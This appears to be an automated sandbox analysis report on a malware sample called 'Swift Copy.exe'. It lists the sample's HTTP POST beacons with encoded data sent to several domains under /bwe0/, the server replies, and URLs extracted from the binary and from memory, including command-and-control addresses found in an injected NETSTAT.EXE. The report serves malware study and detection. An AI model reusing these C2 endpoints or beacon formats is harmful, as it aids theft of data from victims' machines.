Source: Joe Sandbox View | IP Address: 103.67.235.120
Source: global traffic | HTTP traffic detected:
  POST /bwe0/ HTTP/1.1
  Host: www.expectedclosure.one
  Connection: close
  Content-Length: 412
  Cache-Control: no-cache
  Origin: http://www.expectedclosure.one
  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
  Content-Type: application/x-www-form-urlencoded
  Accept: */*
  Referer: http://www.expectedclosure.one/bwe0/
  Accept-Language: en-US
  Accept-Encoding: gzip, deflate
  Data Raw: 39 72 56 38 7a 6c 3d 7e 32 79 62 59 68 7a 7a 38 51 68 46 58 58 28 4a 67 53 55 6c 6f 2d 48 71 71 46 7a 32 35 55 73 73 50 4a 64 6e 6e 78 4e 52 75 45 56 76 44 41 36 6b 34 49 41 4c 69 64 64 7a 56 52 38 2d 71 61 6e 6a 7a 56 6a 6b 45 76 48 4f 4f 33 6e 49 77 43 79 55 49 42 75 61 44 77 50 31 32 7a 6e 6b 36 69 36 48 34 61 32 52 46 74 70 30 57 46 4f 6a 66 66 79 38 4e 53 70 53 77 79 64 5a 78 55 45 34 31 57 42 39 66 32 47 33 42 79 62 33 7a 6d 34 42 33 63 52 46 44 43 6b 48 6c 38 4d 34 6e 4e 4b 53 39 78 66 6a 30 62 37 4b 4c 50 55 75 75 4a 30 57 41 4e 30 61 6c 6d 38 57 52 63 34 63 77 46 6d 5f 4e 4b 44 32 71 70 59 38 49 37 78 39 28 46 57 30 36 66 63 68 74 42 71 6c 7e 33 49 38 75 6c 52 41 63 31 36 4d 45 6c 76 75 66 4a 68 31 5a 49 62 55 6a 33 6c 36 41 2d 33 6f 33 6c 4b 43 78 41 41 58 33 57 32 33 34 74 48 6a 42 4f 28 5a 7a 38 5a 76 78 4d 51 6f 37 6a 64 59 58 2d 46 6b 54 6e 39 62 69 6f 4b 74 55 68 78 4e 45 55 31 73 66 79 33 5f 52 4d 68 4a 64 51 74 49 59 67 76 52 6c 37 54 37 67 62 69 6e 54 74 7e 38 54 2d 57 62 51 36 74 77 42 48 77 66 71 45 53 50 7a 39 70 31 4a 58 46 4e 34 37 67 33 67 68 7e 4f 47 49 4a 4b 56 42 52 67 30 6b 68 59 33 50 79 37 7e 46 6d 76 66 7a 7a 58 30 57 6b 69 46 68 6e 6c 32 53 45 67 57 71 46 39 6e 46 70 70 39 67 29 2e 00 00 00 00 00 00 00 00
  Data Ascii: 9rV8zl=~2ybYhzz8QhFXX(JgSUlo-HqqFz25UssPJdnnxNRuEVvDA6k4IALiddzVR8-qanjzVjkEvHOO3nIwCyUIBuaDwP12znk6i6H4a2RFtp0WFOjffy8NSpSwydZxUE41WB9f2G3Byb3zm4B3cRFDCkHl8M4nNKS9xfj0b7KLPUuuJ0WAN0alm8WRc4cwFm_NKD2qpY8I7x9(FW06fchtBql~3I8ulRAc16MElvufJh1ZIbUj3l6A-3o3lKCxAAX3W234tHjBO(Zz8ZvxMQo7jdYX-FkTn9bioKtUhxNEU1sfy3_RMhJdQtIYgvRl7T7gbinTt~8T-WbQ6twBHwfqESPz9p1JXFN47g3gh~OGIJKVBRg0khY3Py7~FmvfzzX0WkiFhnl2SEgWqF9nFpp9g).
Source: global traffic | HTTP traffic detected:
  POST /bwe0/ HTTP/1.1
  Host: www.kinemartigues.com
  Connection: close
  Content-Length: 412
  Cache-Control: no-cache
  Origin: http://www.kinemartigues.com
  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
  Content-Type: application/x-www-form-urlencoded
  Accept: */*
  Referer: http://www.kinemartigues.com/bwe0/
  Accept-Language: en-US
  Accept-Encoding: gzip, deflate
  Data Raw: 39 72 56 38 7a 6c 3d 42 35 56 53 6a 37 71 39 4f 72 72 58 74 30 51 79 4f 33 7e 74 35 48 47 34 67 51 31 49 59 47 6a 41 6b 72 34 67 72 63 6c 73 51 54 5a 79 67 4a 6d 79 43 5a 56 7a 4f 61 65 35 6d 38 72 2d 70 4f 67 62 72 55 73 35 73 78 63 45 71 6a 7a 63 62 49 6a 59 62 75 49 6d 6f 38 36 54 73 4a 73 4e 69 73 59 4d 4d 6a 4b 71 35 66 63 31 77 49 6d 69 59 46 41 31 64 32 6c 75 59 43 73 62 4b 49 57 31 32 2d 4d 51 46 43 6f 7a 64 79 6d 4a 69 37 6e 30 65 58 79 5f 37 5f 38 6a 28 6c 75 66 35 59 31 6d 66 4e 71 6c 56 61 78 45 37 35 63 6a 33 5a 66 61 6f 33 6e 4f 43 30 50 6b 31 57 54 43 28 33 4f 55 42 64 69 65 5a 4a 55 76 4b 6a 65 44 36 41 69 53 6e 43 59 6f 28 46 70 64 39 32 50 7a 6a 7a 51 54 43 64 43 56 63 32 38 74 51 58 67 56 37 52 34 42 71 2d 4b 37 64 4a 5a 76 39 48 6b 31 39 6a 65 35 51 75 34 50 7e 58 64 54 33 56 79 47 48 33 4c 5a 57 45 6c 76 45 65 77 67 44 33 67 6c 35 42 28 73 5a 34 31 47 71 34 7e 39 30 59 6c 33 5a 37 57 51 34 4f 55 67 6b 67 4d 57 67 45 4f 37 4d 48 72 6d 34 72 4d 74 33 38 57 78 53 31 57 56 49 5a 5a 32 38 6d 74 7a 67 45 4f 4d 35 62 5a 62 28 6e 64 61 7a 59 5a 4a 56 78 4c 39 5a 6a 59 4d 4d 41 48 58 47 4b 4b 35 30 6d 37 58 54 74 61 57 63 74 7a 4a 35 52 42 57 71 6c 74 7a 6d 59 62 62 72 43 6d 74 65 62 4a 55 6b 41 29 2e 00 00 00 00 00 00 00 00
  Data Ascii: 9rV8zl=B5VSj7q9OrrXt0QyO3~t5HG4gQ1IYGjAkr4grclsQTZygJmyCZVzOae5m8r-pOgbrUs5sxcEqjzcbIjYbuImo86TsJsNisYMMjKq5fc1wImiYFA1d2luYCsbKIW12-MQFCozdymJi7n0eXy_7_8j(luf5Y1mfNqlVaxE75cj3Zfao3nOC0Pk1WTC(3OUBdieZJUvKjeD6AiSnCYo(Fpd92PzjzQTCdCVc28tQXgV7R4Bq-K7dJZv9Hk19je5Qu4P~XdT3VyGH3LZWElvEewgD3gl5B(sZ41Gq4~90Yl3Z7WQ4OUgkgMWgEO7MHrm4rMt38WxS1WVIZZ28mtzgEOM5bZb(ndazYZJVxL9ZjYMMAHXGKK50m7XTtaWctzJ5RBWqltzmYbbrCmtebJUkA).
Source: global traffic | HTTP traffic detected:
  POST /bwe0/ HTTP/1.1
  Host: www.epic45.co.uk
  Connection: close
  Content-Length: 412
  Cache-Control: no-cache
  Origin: http://www.epic45.co.uk
  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
  Content-Type: application/x-www-form-urlencoded
  Accept: */*
  Referer: http://www.epic45.co.uk/bwe0/
  Accept-Language: en-US
  Accept-Encoding: gzip, deflate
  Data Raw: 39 72 56 38 7a 6c 3d 37 33 46 44 59 52 4b 62 51 55 65 6b 6e 4e 72 35 6d 35 77 70 70 4a 66 6a 4c 6a 65 54 6b 43 74 32 64 71 71 4c 43 68 42 78 62 34 65 36 59 73 33 4f 32 5f 28 78 59 74 54 62 4d 4b 4f 35 7a 42 4d 4b 54 49 63 4d 35 6f 54 4e 39 58 42 31 36 72 58 36 57 7a 41 37 72 66 6b 73 4e 4a 70 74 34 59 78 54 55 6e 39 59 71 34 39 46 4f 42 49 48 46 48 59 74 57 47 62 38 69 5a 4b 46 7e 4e 63 39 41 36 42 6c 39 68 4e 43 76 6d 73 57 75 75 77 50 4e 5a 7e 32 7e 33 39 74 69 42 75 4f 56 36 45 7a 79 69 54 57 59 48 42 4f 42 49 74 6d 6a 5a 4e 68 31 42 47 50 35 49 69 78 6f 65 76 65 63 52 45 53 6e 66 50 43 78 50 5a 4a 72 75 77 78 30 72 6d 68 74 6a 34 75 5a 41 50 46 71 5f 59 6a 61 4b 4b 36 53 71 7e 68 55 46 6e 44 67 37 54 38 41 36 52 2d 77 33 4c 54 57 41 30 52 4b 5a 77 30 31 69 33 4d 72 45 32 35 38 63 46 6d 74 4d 39 5a 35 54 7a 31 41 69 38 4e 45 32 6d 67 36 64 37 65 41 59 46 5f 30 6f 77 64 77 6c 45 51 56 44 51 65 51 4a 78 50 59 2d 61 4e 72 52 36 57 67 62 30 4f 4b 34 37 63 41 72 34 5a 4b 6b 6c 75 6f 63 36 75 36 46 4d 61 62 5a 42 32 74 63 70 49 6f 7a 73 63 75 72 32 43 75 34 46 44 73 77 77 5f 4c 69 48 41 32 66 6e 2d 59 53 7e 64 58 37 32 42 74 37 4d 61 57 67 31 57 67 6d 42 78 77 38 63 31 28 76 66 70 38 4e 69 7a 79 50 53 4a 67 51 29 2e 00 00 00 00 00 00 00 00
  Data Ascii: 9rV8zl=73FDYRKbQUeknNr5m5wppJfjLjeTkCt2dqqLChBxb4e6Ys3O2_(xYtTbMKO5zBMKTIcM5oTN9XB16rX6WzA7rfksNJpt4YxTUn9Yq49FOBIHFHYtWGb8iZKF~Nc9A6Bl9hNCvmsWuuwPNZ~2~39tiBuOV6EzyiTWYHBOBItmjZNh1BGP5IixoevecRESnfPCxPZJruwx0rmhtj4uZAPFq_YjaKK6Sq~hUFnDg7T8A6R-w3LTWA0RKZw01i3MrE258cFmtM9Z5Tz1Ai8NE2mg6d7eAYF_0owdwlEQVDQeQJxPY-aNrR6Wgb0OK47cAr4ZKkluoc6u6FMabZB2tcpIozscur2Cu4FDsww_LiHA2fn-YS~dX72Bt7MaWg1WgmBxw8c1(vfp8NizyPSJgQ).
Source: global traffic | HTTP traffic detected:
  POST /bwe0/ HTTP/1.1
  Host: www.mogdento.com
  Connection: close
  Content-Length: 412
  Cache-Control: no-cache
  Origin: http://www.mogdento.com
  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
  Content-Type: application/x-www-form-urlencoded
  Accept: */*
  Referer: http://www.mogdento.com/bwe0/
  Accept-Language: en-US
  Accept-Encoding: gzip, deflate
  Data Raw: 39 72 56 38 7a 6c 3d 54 48 56 65 71 57 49 4c 62 30 44 33 79 56 36 4d 38 64 75 30 4f 69 77 5f 64 46 49 30 49 61 53 46 4c 6e 77 7a 28 37 6f 72 6e 33 48 6a 64 75 7a 78 79 7a 47 48 61 41 50 6b 37 77 57 49 47 67 71 37 5a 63 6e 77 56 53 39 2d 71 76 63 72 4f 30 6a 70 67 63 61 54 79 38 56 78 56 37 54 46 72 54 4a 33 35 46 48 49 45 79 68 6f 76 33 65 70 64 76 42 4d 66 39 34 41 79 6a 47 2d 49 52 6f 34 6f 64 59 4f 4b 6f 37 58 74 64 5a 36 6f 74 47 71 30 7a 48 6f 49 74 62 39 6d 78 78 74 4d 51 56 2d 7e 64 75 43 63 78 63 2d 38 36 7a 31 38 4f 53 77 31 4a 6b 6a 4e 32 4b 6b 76 4b 43 76 50 39 34 41 56 79 6a 78 56 38 67 6a 6a 32 30 45 4b 39 41 38 45 50 48 43 71 76 49 4c 62 4d 28 74 62 71 46 6b 42 33 7e 4f 30 49 6b 36 69 73 46 52 62 75 75 78 7e 51 28 62 50 6d 5a 78 78 6c 43 43 70 70 69 5f 7e 4f 4c 77 49 68 4d 67 30 33 28 6e 59 78 32 64 56 31 35 4e 37 66 46 48 77 67 65 4a 68 59 4a 53 28 2d 7e 54 76 35 4f 33 47 4c 46 30 75 51 30 4b 69 49 34 74 48 41 44 55 6f 67 66 33 38 68 6b 41 4c 5f 4d 70 6c 4d 38 53 46 6a 39 45 4a 48 66 4b 6e 38 54 6d 66 31 77 43 63 5f 42 32 5a 71 59 31 59 4a 52 73 33 76 57 58 73 58 5a 41 68 73 4c 62 4c 59 59 33 56 5f 64 36 31 71 56 34 41 66 7e 79 65 6d 57 78 50 69 4d 6e 50 61 43 39 46 61 57 69 57 6c 4b 55 65 77 29 2e 00 00 00 00 00 00 00 00
  Data Ascii: 9rV8zl=THVeqWILb0D3yV6M8du0Oiw_dFI0IaSFLnwz(7orn3HjduzxyzGHaAPk7wWIGgq7ZcnwVS9-qvcrO0jpgcaTy8VxV7TFrTJ35FHIEyhov3epdvBMf94AyjG-IRo4odYOKo7XtdZ6otGq0zHoItb9mxxtMQV-~duCcxc-86z18OSw1JkjN2KkvKCvP94AVyjxV8gjj20EK9A8EPHCqvILbM(tbqFkB3~O0Ik6isFRbuux~Q(bPmZxxlCCppi_~OLwIhMg03(nYx2dV15N7fFHwgeJhYJS(-~Tv5O3GLF0uQ0KiI4tHADUogf38hkAL_MplM8SFj9EJHfKn8Tmf1wCc_B2ZqY1YJRs3vWXsXZAhsLbLYY3V_d61qV4Af~yemWxPiMnPaC9FaWiWlKUew).
Source: global traffic | HTTP traffic detected:
  HTTP/1.1 404 Not Found
  Server: nginx/1.14.1
  Date: Thu, 11 Aug 2022 04:29:41 GMT
  Content-Length: 0
  Connection: close
  X-Rate-Limit-Limit: 5s
  X-Rate-Limit-Remaining: 9
  X-Rate-Limit-Reset: 2022-08-11T04:29:46.0784500Z
Source: global traffic | HTTP traffic detected:
  HTTP/1.1 404 Not Found
  Server: nginx
  Date: Thu, 11 Aug 2022 04:30:01 GMT
  Content-Type: text/html; charset=iso-8859-1
  Content-Length: 393
  Connection: close
  Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0a 3c 68 72 3e 0a 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 31 30 20 28 44 65 62 69 61 6e 29 20 53 65 72 76 65 72 20 61 74 20 65 70 69 63 34 35 2e 63 6f 2e 75 6b 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
  Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p><hr><address>Apache/2.4.10 (Debian) Server at epic45.co.uk Port 80</address></body></html>
Source: global traffic | HTTP traffic detected:
  HTTP/1.1 404 Not Found
  Server: nginx
  Date: Thu, 11 Aug 2022 04:30:03 GMT
  Content-Type: text/html; charset=iso-8859-1
  Content-Length: 393
  Connection: close
  Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0a 3c 68 72 3e 0a 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 31 30 20 28 44 65 62 69 61 6e 29 20 53 65 72 76 65 72 20 61 74 20 65 70 69 63 34 35 2e 63 6f 2e 75 6b 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
  Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p><hr><address>Apache/2.4.10 (Debian) Server at epic45.co.uk Port 80</address></body></html>
Source: global traffic | HTTP traffic detected:
  HTTP/1.1 404 Not Found
  Date: Thu, 11 Aug 2022 04:30:09 GMT
  Server: Apache
  Expires: Wed, 11 Jan 1984 05:00:00 GMT
  Cache-Control: no-cache, must-revalidate, max-age=0
  Link: <https://mogdento.com/wp-json/>; rel="https://api.w.org/"
  Connection: close
  Transfer-Encoding: chunked
  Content-Type: text/html; charset=UTF-8
  Data Raw: 33 65 33 30 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0d 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 20 6e 6f 2d 73 76 67 22 3e 0d 0a 3c 68 65 61 64 3e 0d 0a 09 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0d 0a 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 3e 0d 0a 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 27 72 6f 62 6f 74 73 27 20 63 6f 6e 74 65 6e 74 3d 27 6e 6f 69 6e 64 65 78 2c 20 66 6f 6c 6c 6f 77 27 20 2f 3e 0a 0a 09 3c 21 2d 2d 20 54 68 69 73 20 73 69 74 65 20 69 73 20 6f 70 74 69 6d 69 7a 65 64 20 77 69 74 68 20 74 68 65 20 59 6f 61 73 74 20 53 45 4f 20 70 6c 75 67 69 6e 20 76 31 39 2e 34 20 2d 20 68 74 74 70 73 3a 2f 2f 79 6f 61 73 74 2e 63 6f 6d 2f 77 6f 72 64 70 72 65 73 73 2f 70 6c 75 67 69 6e 73 2f 73 65 6f 2f 20 2d 2d 3e 0a 09 3c 74 69 74 6c 65 3e 50 61 67 65 20 6e 6f 74 20 66 6f 75 6e 64 20 2d 20 4d 4f 47 44 45 4e 54 4f 3c 2f 74 69 74 6c 65 3e 0a 09 3c 6d 65 74 61 20 70 72 6f 70 65 72 74 79 3d 22 6f 67 3a 6c 6f 63 61 6c 65 22 20 63 6f 6e 74 65 6e 74 3d 22 65 6e 5f 55 53 22 20 2f 3e 0a 09 3c 6d 65 74 61 20 70 72 6f 70 65 72 74 79 3d 22 6f 67 3a 74 69 74 6c 65 22 20 63 6f 6e 74 65 6e 74 3d 22 50 61 67 65 20 6e 6f 74 20 66 6f 75 6e 64 20 2d 20 4d 4f 47 44 45 4e 54 4f 22 20 2f 3e 0a 09 3c 6d 65 74 61 20 70 72 6f 70 65 72 74 79 3d 22 6f 67 3a 73 69 74 65 5f 6e 61 6d 65 22 20 63 6f 6e 74 65 6e 74 3d 22 4d 4f 47 44 45 4e 54 4f 22 20 2f 3e 0a 09 3c 73 63 72 69 70 74 20 74 79 70 65 3d 22 61 70 70 6c 69 63 61 74 69 6f 6e 2f 6c 64 2b 6a 73 6f 6e 22 20 63 6c 61 73 73 3d 22 79 6f 61 73 74 2d 73 63 68 65 6d 61 2d 67 72 61 70 68 22 3e 7b 22 40 63 6f 6e 74 65 78 74 22 3a 22 68 74 74 70 73 3a 2f 2f 73 63 68 65 6d 61 2e 6f 72 67 22 2c 22 40 67 72 61 70 68 22 3a 5b 7b 22 40 74 79 70 65 22 3a 22 4f 72 67 61 6e 69 7a 61 74 69 6f 6e 22 2c 22 40 69 64 22 3a 22 68 74 74 70 73 3a 2f 2f 6d 6f 67 64 65 6e 74 6f 2e 63 6f 6d 2f 23 6f 72 67 61 6e 69 7a 61 74 69 6f 6e 22 2c 22 6e 61 6d 65 22 3a 22 4d 4f 47 44 45 4e 54 4f 22 2c 22 75 72 6c 22 3a 22 68 74 74 70 73 3a 2f 2f 6d 6f 67 64 65 6e 74 6f 2e 63 6f 6d 2f 22 2c 22 73 61 6d 65 41 73 22 3a 5b 5d 2c 22 6c 6f 67 6f 22 3a 7b 22 40 74 79 70 65 22 3a 22 49 6d 61 67 65 4f 62 6a 65 63 74 22 2c 22 69 6e 4c 61 6e 67 75 61 67 65 22 3a 22 65 6e 2d 55 53 22 2c 22 40 69 64 22 3a 22 68 74 74 70 73 3a 2f 2f 6d 6f 67 64 65 6e 74 6f 2e 63 6f 6d 2f 23 2f 73 63 68 65 6d 61 2f 6c 6f 67 6f 2f 69 6d 61 67 65 2f 22 2c 22 75 72 6c 22 3a 22 68 74 74 70 73 3a 2f 2f 6d 6f 67 64 6
          Source: Swift Copy.exe, 00000000.00000002.291592246.0000000006542000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://fontfabrik.com
          Source: NETSTAT.EXE, 00000019.00000002.518477134.0000000003996000.00000004.10000000.00040000.00000000.sdmp | String found in binary or memory: http://mogdento.com/bwe0/?YN9=w6PTp6pp-Zfte2a0&9rV8zl=eF9
          Source: Swift Copy.exe, ImUIYlbLTIh.exe.0.dr | String found in binary or memory: http://philiphanson.org/medius/book/1.0
          Source: explorer.exe, 0000000B.00000000.339382801.00000000061ED000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000B.00000000.323818744.00000000061ED000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000B.00000000.389826737.00000000061ED000.00000004.00000001.00020000.00000000.sdmp | String found in binary or memory: http://schemas.micr$
          Source: Swift Copy.exe, 00000000.00000002.286746529.0000000002670000.00000004.00000800.00020000.00000000.sdmp, Swift Copy.exe, 00000000.00000002.284828644.0000000002420000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
          Source: Swift Copy.exe, 00000000.00000002.291592246.0000000006542000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0
          Source: Swift Copy.exe, 00000000.00000002.291592246.0000000006542000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://www.carterandcone.coml
          Source: Swift Copy.exe, 00000000.00000002.291592246.0000000006542000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://www.fontbureau.com
          Source: Swift Copy.exe, 00000000.00000002.291592246.0000000006542000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://www.fontbureau.com/designers
          Source: Swift Copy.exe, 00000000.00000002.291592246.0000000006542000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://www.fontbureau.com/designers/?
          Source: Swift Copy.exe, 00000000.00000002.291592246.0000000006542000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://www.fontbureau.com/designers/cabarga.htmlN
          Source: Swift Copy.exe, 00000000.00000002.291592246.0000000006542000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://www.fontbureau.com/designers/frere-jones.html
          Source: Swift Copy.exe, 00000000.00000002.291592246.0000000006542000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://www.fontbureau.com/designers8
          Source: Swift Copy.exe, 00000000.00000002.291592246.0000000006542000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://www.fontbureau.com/designers?
          Source: Swift Copy.exe, 00000000.00000002.291592246.0000000006542000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://www.fontbureau.com/designersG
          Source: Swift Copy.exe, 00000000.00000002.291592246.0000000006542000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://www.fonts.com
          Source: Swift Copy.exe, 00000000.00000002.291592246.0000000006542000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://www.founder.com.cn/cn
          Source: Swift Copy.exe, 00000000.00000002.291592246.0000000006542000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://www.founder.com.cn/cn/bThe
          Source: Swift Copy.exe, 00000000.00000002.291592246.0000000006542000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://www.founder.com.cn/cn/cThe
          Source: Swift Copy.exe, 00000000.00000002.291592246.0000000006542000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://www.galapagosdesign.com/DPlease
          Source: Swift Copy.exe, 00000000.00000002.291592246.0000000006542000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://www.galapagosdesign.com/staff/dennis.htm
          Source: Swift Copy.exe, 00000000.00000002.291592246.0000000006542000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://www.goodfont.co.kr
          Source: Swift Copy.exe, 00000000.00000002.291592246.0000000006542000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://www.jiyu-kobo.co.jp/
          Source: Swift Copy.exe, 00000000.00000002.291592246.0000000006542000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://www.sajatypeworks.com
          Source: Swift Copy.exe, 00000000.00000002.291592246.0000000006542000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://www.sakkal.com
          Source: Swift Copy.exe, 00000000.00000002.291592246.0000000006542000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://www.sandoll.co.kr
          Source: Swift Copy.exe, 00000000.00000002.291592246.0000000006542000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://www.tiro.com
          Source: Swift Copy.exe, 00000000.00000002.291592246.0000000006542000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://www.typography.netD
          Source: Swift Copy.exe, 00000000.00000002.291592246.0000000006542000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://www.urwpp.deDPlease
          Source: Swift Copy.exe, 00000000.00000002.291592246.0000000006542000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://www.zhongyicts.com.cn
          Source: NETSTAT.EXE, 00000019.00000002.518373021.00000000036A2000.00000004.10000000.00040000.00000000.sdmp | String found in binary or memory: https://www.expectedclosure.one/bwe0/?9rV8zl=z0a7bU3Grk9SZV
          Source: NETSTAT.EXE, 00000019.00000002.518409409.000000000379E000.00000004.10000000.00040000.00000000.sdmp | String found in binary or memory: https://www.kinemartigues.com/bwe0/?YN9=w6PTp6pp-Zfte2a0&9rV8zl=M79ygOKZB
          Source: NETSTAT.EXE, 00000019.00000002.518409409.000000000379E000.00000004.10000000.00040000.00000000.sdmp | String found in binary or memory: https://www.kinemartigues.com/bwe0/?YN9=w6PTp6pp-Zfte2a0&amp;9rV8zl=M79ygOKZB
          Source: unknownHTTP traffic detected: POST /bwe0/ HTTP/1.1Host: www.expectedclosure.oneConnection: closeContent-Length: 412Cache-Control: no-cacheOrigin: http://www.expectedclosure.oneUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://www.expectedclosure.one/bwe0/Accept-Language: en-USAccept-Encoding: gzip, deflateData Raw: 39 72 56 38 7a 6c 3d 7e 32 79 62 59 68 7a 7a 38 51 68 46 58 58 28 4a 67 53 55 6c 6f 2d 48 71 71 46 7a 32 35 55 73 73 50 4a 64 6e 6e 78 4e 52 75 45 56 76 44 41 36 6b 34 49 41 4c 69 64 64 7a 56 52 38 2d 71 61 6e 6a 7a 56 6a 6b 45 76 48 4f 4f 33 6e 49 77 43 79 55 49 42 75 61 44 77 50 31 32 7a 6e 6b 36 69 36 48 34 61 32 52 46 74 70 30 57 46 4f 6a 66 66 79 38 4e 53 70 53 77 79 64 5a 78 55 45 34 31 57 42 39 66 32 47 33 42 79 62 33 7a 6d 34 42 33 63 52 46 44 43 6b 48 6c 38 4d 34 6e 4e 4b 53 39 78 66 6a 30 62 37 4b 4c 50 55 75 75 4a 30 57 41 4e 30 61 6c 6d 38 57 52 63 34 63 77 46 6d 5f 4e 4b 44 32 71 70 59 38 49 37 78 39 28 46 57 30 36 66 63 68 74 42 71 6c 7e 33 49 38 75 6c 52 41 63 31 36 4d 45 6c 76 75 66 4a 68 31 5a 